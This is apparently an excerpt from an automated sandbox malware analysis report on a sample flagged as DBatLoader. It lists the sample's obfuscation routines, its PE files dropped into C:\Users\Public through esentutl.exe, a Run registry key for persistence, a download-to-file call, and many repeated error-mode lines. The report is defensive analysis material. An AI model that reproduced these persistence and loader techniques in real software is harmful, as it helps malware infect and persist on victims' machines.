                    Source: Binary string: easinvoker.pdb source: XjPA2pnUhC.exe, XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.000000000281A000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027B7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2102414872.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
                    Source: Binary string: easinvoker.pdbH source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E621000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E650000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.000000000281A000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027B7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2102414872.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr

                    Data Obfuscation

                    barindex
                    Yara detected DBatLoader
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.22a65a8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
                    Source: alpha.pif.4.drStatic PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0290894C
                    Source: alpha.pif.4.drStatic PE information: section name: .didat
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F63AE push 028F640Bh; ret 0_2_028F6403
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F63B0 push 028F640Bh; ret 0_2_028F6403
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028FC349 push 8B028FC1h; ret 0_2_028FC34E
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0291C378 push 0291C56Eh; ret 0_2_0291C566
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F6784 push 028F67C6h; ret 0_2_028F67BE
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F6782 push 028F67C6h; ret 0_2_028F67BE
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029CE716 push ecx; ret 0_2_029CE729
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029AC446 push ecx; ret 0_2_029AC459
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0291C570 push 0291C56Eh; ret 0_2_0291C566
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028FC56C push ecx; mov dword ptr [esp], edx0_2_028FC571
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02908AD8 push 02908B10h; ret 0_2_02908B08
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290AAE0 push 0290AB18h; ret 0_2_0290AB10
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028FCA4E push 028FCD72h; ret 0_2_028FCD6A
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02964A50 push eax; ret 0_2_02964B20
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028FCBEC push 028FCD72h; ret 0_2_028FCD6A
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290886C push 029088AEh; ret 0_2_029088A6
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02906946 push 029069F3h; ret 0_2_029069EB
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02906948 push 029069F3h; ret 0_2_029069EB
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02902F60 push 02902FD6h; ret 0_2_02902FCE
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0291D2FC push 0291D367h; ret 0_2_0291D35F
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F332C push eax; ret 0_2_028F3368
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0291D0AC push 0291D125h; ret 0_2_0291D11D
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029CF038 push eax; ret 0_2_029CF056
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290306B push 029030B9h; ret 0_2_029030B1
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290306C push 029030B9h; ret 0_2_029030B1
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0291D1F8 push 0291D288h; ret 0_2_0291D280
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290F108 push ecx; mov dword ptr [esp], edx0_2_0290F10D
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0291D144 push 0291D1ECh; ret 0_2_0291D1E4
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028FD5A0 push 028FD5CCh; ret 0_2_028FD5C4
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290790C push 02907989h; ret 0_2_02907981
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02905E7C push ecx; mov dword ptr [esp], edx0_2_02905E7E

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Qzzgbhha.PIFJump to dropped file
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F96EEB ShellExecuteW,URLDownloadToFileW,7_2_02F96EEB
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Qzzgbhha.PIFJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file

                    Boot Survival

                    barindex
                    Drops PE files to the user root directory
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FAAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_02FAAADB
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QzzgbhhaJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QzzgbhhaJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0290AB1C
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
